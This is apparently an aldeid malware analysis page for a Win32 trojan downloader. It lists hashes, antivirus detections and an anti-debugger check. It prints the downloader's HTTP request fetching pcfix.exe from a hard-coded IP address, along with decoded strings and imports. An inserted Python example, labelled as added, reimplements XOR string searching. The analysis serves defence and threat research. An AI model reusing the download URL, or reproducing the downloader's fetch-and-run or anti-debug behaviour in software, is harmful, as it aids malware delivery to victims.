77f1f61ade4b3d8ea179c77a1f94e00f

From aldeid

Description

Summary

INCOMPLETE SECTION OR ARTICLE
This section/article is still being written and is therefore not complete.
Thank you for your understanding.

Packer

The malware is not packed.

Identification

MD5            77f1f61ade4b3d8ea179c77a1f94e00f
SHA1           d663516dd0a07ed1bb3d396ab9227678b36168f6
SHA256         259543f15f315338e7589a036bd916c7a0a9011fe288b4c6ca13b0f62c0db74b
ssdeep         192:1dPCXEd553SAYT9FJtKE7g8kxJEw8oHAKIb/i:2X4mAulPih82a
imphash        e6ff134ef1c2551faf58990dc90eab51
File size      8.5 KB (8704 bytes)
File type      Win32 EXE
Magic literal  PE32 executable for MS Windows (GUI) Intel 80386 32-bit

Antivirus detection

Antivirus             Result                                    Update
--------------------------------------------------------------------------------
AVG                   Generic29.CJAT                            20140220
Ad-Aware              Trojan.Generic.8003982                    20140220
AntiVir               TR/Rogue.8003982.3                        20140220
Antiy-AVL             Trojan[Downloader:HEUR]/Win32.Unknown     20140219
Avast                 Win32:Trojan-gen                          20140220
BitDefender           Trojan.Generic.8003982                    20140220
Commtouch             W32/Downloader-Sml!Eldorado               20140220
Comodo                UnclassifiedMalware                       20140220
ESET-NOD32            probably unknown NewHeur_PE               20140220
Emsisoft              Trojan.Generic.8003982 (B)                20140220
F-Prot                W32/Downloader-Sml!Eldorado               20140220
Fortinet              NewHeur_PE                                20140220
GData                 Trojan.Generic.8003982                    20140220
Ikarus                Trojan-Downloader.Win32.Small             20140220
Jiangmin              TrojanDownloader.Generic.aigb             20140220
Kaspersky             HEUR:Trojan-Downloader.Win32.Generic      20140220
McAfee                Artemis!77F1F61ADE4B                      20140220
McAfee-GW-Edition     Artemis!77F1F61ADE4B                      20140220
MicroWorld-eScan      Trojan.Generic.8003982                    20140220
NANO-Antivirus        Trojan.Win32.DownloaderSml!.bdenni        20140220
Norman                Downloader                                20140220
Sophos                Mal/Generic-S                             20140220
Symantec              Trojan.Gen                                20140220
TrendMicro            TROJ_GEN.R0CBC0OI413                      20140220
TrendMicro-HouseCall  TROJ_GEN.R0CBC0OI413                      20140220
VIPRE                 Trojan-Downloader.Win32.Small!cobra (v)   20140220
nProtect              Trojan.Generic.8003982                    20140220
Agnitum               -                                         20140219
AhnLab-V3             -                                         20140220
Baidu-International   -                                         20140220
Bkav                  -                                         20140220
ByteHero              -                                         20140220
CAT-QuickHeal         -                                         20140220
CMC                   -                                         20140220
ClamAV                -                                         20140220
DrWeb                 -                                         20140220
F-Secure              -                                         20140220
K7AntiVirus           -                                         20140219
K7GW                  -                                         20140219
Kingsoft              -                                         20130829
Malwarebytes          -                                         20140220
Microsoft             -                                         20140220
Panda                 -                                         20140220
Qihoo-360             -                                         20140220
Rising                -                                         20140219
SUPERAntiSpyware      -                                         20140220
TheHacker             -                                         20140220
TotalDefense          -                                         20140219
VBA32                 -                                         20140220
ViRobot               -                                         20140220

Defensive capabilities

IsDebuggerPresent

The IsDebuggerPresent API is called in the code to detect whether the process is running under a debugger such as OllyDbg; if it is, execution branches to loc_100146D:

.text:01001290                 call    ds:IsDebuggerPresent
.text:01001296                 test    eax, eax
.text:01001298                 jnz     loc_100146D

Dynamic analysis

Network indicators

HTTP request to 1.234.27.146:

GET /pcfix.exe?affid=23456732-34459 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: 1.234.27.146
Connection: Keep-Alive

Files

INCOMPLETE SECTION OR ARTICLE
This section/article is still being written and is therefore not complete.
Thank you for your understanding.

Registry keys

INCOMPLETE SECTION OR ARTICLE
This section/article is still being written and is therefore not complete.
Thank you for your understanding.

Mutexes

INCOMPLETE SECTION OR ARTICLE
This section/article is still being written and is therefore not complete.
Thank you for your understanding.

Static analysis

Sections

Name       VirtAddr     VirtSize     RawSize      Entropy     
--------------------------------------------------------------------------------
.text      0x1000       0x1388       0x1400       6.167402    
.data      0x3000       0x784        0x600        4.493349    
.reloc     0x4000       0x400        0x400        2.738901

Strings

In the clear

Could not retrieve temporary path, exiting
Could not execute file, exiting
Check 
Could not download the URL to our target path, exiting
Downloading 
Could not create tmpfile, exiting
('8PW
700PP
```hhh
xppwpp
PSSSSSSS
URPQQh
L$,3
UVWS
[_^]
SVWj
_^[]
8csm
t h|7
8csm
_^[]
Y__^[
t?!E
v	N+D$
UQPXY]Y[
CreateProcessA
OutputDebugStringA
GetTempFileNameA
GetTempPathA
IsDebuggerPresent
KERNEL32.dll
strncat
strncpy
memset
__getmainargs
_cexit
_exit
_XcptFilter
exit
_initterm
_amsg_exit
__setusermatherr
__p__commode
__p__fmode
__set_app_type
msvcrt.dll
?terminate@@YAXXZ
_controlfp
URLDownloadToFileA
urlmon.dll
InterlockedExchange
Sleep
InterlockedCompareExchange
RtlUnwind
SetUnhandledExceptionFilter
GetModuleHandleA
QueryPerformanceCounter
GetTickCount
GetCurrentThreadId
GetCurrentProcessId
GetSystemTimeAsFileTime
TerminateProcess
GetCurrentProcess
UnhandledExceptionFilter
kU'9
HMXB
?Zd;
?/L[
S;uD
z?aUY
D?$?
U>c{
zc%C1
.:3q
-64OS
NKeb
1,202
333@3I3O3b3i3
3J4S4^4d4
505:5M5W5\5a5
6"6*63696A6M6d6o6u6
727H7m7y7
:,;:;
;$<)<H<_<
=-=:=F=N=V=b=t=
>$>*>4>=>H>V>[>a>l>s>

Additional XOR-encoded strings

The following additional XOR-encoded strings confirm the HTTP request observed during the dynamic analysis (the URL and affiliate id are stored XOR-encoded with the single-byte key 83, which is why they do not appear among the clear-text strings above):

$ ./xorsearch -i -s /data/tmp/getdown.exe http:
Found XOR 83 position 1800: http://1.234.27.146/pcfix.exe
$ strings /data/tmp/getdown.exe.XOR.83
[SNIP]
http://1.234.27.146/pcfix.exe
affid=23456732-34459
[SNIP]
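As an added illustration (not code from the page or from the xorsearch tool itself), the following Python reimplements the single-byte XOR known-plaintext search that xorsearch performs above, then extracts printable strings from the decoded buffer the way the second step does with strings. The buffer it searches is constructed here: arbitrary filler bytes around the two strings the page reports, XOR-encoded with the key xorsearch found (83 = 0x53), so the search reproduces the key and recovers both strings. The ignore_case flag mirrors xorsearch's -i option.

```python
"""Single-byte XOR known-plaintext search, the technique xorsearch applies above."""
import re
from typing import List, Tuple


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte of data with a single-byte key (the operation is its own inverse)."""
    return bytes(b ^ key for b in data)


def xor_search(data: bytes, needle: bytes, ignore_case: bool = False) -> List[Tuple[int, int]]:
    """Try every single-byte key 0..255 and return (key, offset) for each place
    where the decoded buffer contains needle. Key 0 reports plaintext hits;
    ignore_case lower-cases both sides, like xorsearch -i."""
    if ignore_case:
        needle = needle.lower()
    hits: List[Tuple[int, int]] = []
    for key in range(256):
        haystack = xor_bytes(data, key)
        if ignore_case:
            haystack = haystack.lower()
        start = 0
        while (idx := haystack.find(needle, start)) >= 0:
            hits.append((key, idx))
            start = idx + 1
    return hits


def printable_strings(data: bytes, min_len: int = 4) -> List[str]:
    """strings(1)-style extraction: runs of printable ASCII of at least min_len bytes."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


# Constructed sample buffer (not the real binary): the two strings the page
# reports, XOR-encoded with the key xorsearch found, surrounded by filler.
KEY = 0x53  # 83 decimal, as in "Found XOR 83"
PLAIN_URL = b"http://1.234.27.146/pcfix.exe"
PLAIN_AFFID = b"affid=23456732-34459"
SAMPLE = (
    b"MZ\x90\x00" + bytes(range(0x10, 0x60))   # arbitrary leading filler (84 bytes)
    + xor_bytes(PLAIN_URL + b"\x00", KEY)       # encoded URL, NUL-terminated
    + xor_bytes(b"\x00" * 8, KEY)               # padding that decodes to NULs
    + xor_bytes(PLAIN_AFFID + b"\x00", KEY)     # encoded affiliate id, NUL-terminated
    + bytes(range(0x80, 0xFF))                  # arbitrary trailing filler
)


if __name__ == "__main__":
    # Same two-step workflow as on the page: locate the key, then dump the decoded strings.
    for key, offset in xor_search(SAMPLE, b"http:", ignore_case=True):
        decoded = xor_bytes(SAMPLE, key)
        print(f"Found XOR {key} position {offset}: {printable_strings(decoded[offset:])[0]}")
        for s in printable_strings(decoded):
            print("   ", s)
```

Because XOR with a single byte preserves the XOR difference between neighbouring bytes, a needle with a repeated character (the "tt" in "http:") can only match where the raw file has the same repetition, which is why the brute force over 256 keys produces very few false positives on real binaries. A key of 0 in the output simply means the string was found in clear text.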

IAT

KERNEL32.dll

  • CreateProcessA
  • OutputDebugStringA
  • GetTempFileNameA
  • GetTempPathA
  • IsDebuggerPresent
  • UnhandledExceptionFilter
  • GetCurrentProcess
  • TerminateProcess
  • GetSystemTimeAsFileTime
  • GetCurrentProcessId
  • GetCurrentThreadId
  • GetTickCount
  • QueryPerformanceCounter
  • GetModuleHandleA
  • SetUnhandledExceptionFilter
  • RtlUnwind
  • InterlockedCompareExchange
  • Sleep
  • InterlockedExchange

msvcrt.dll

  • __getmainargs
  • _cexit
  • _exit
  • _XcptFilter
  • exit
  • _initterm
  • _amsg_exit
  • __setusermatherr
  • __p__commode
  • __p__fmode
  • __set_app_type
  • ?terminate@@YAXXZ
  • _controlfp
  • strncat
  • strncpy
  • memset

urlmon.dll

  • URLDownloadToFileA
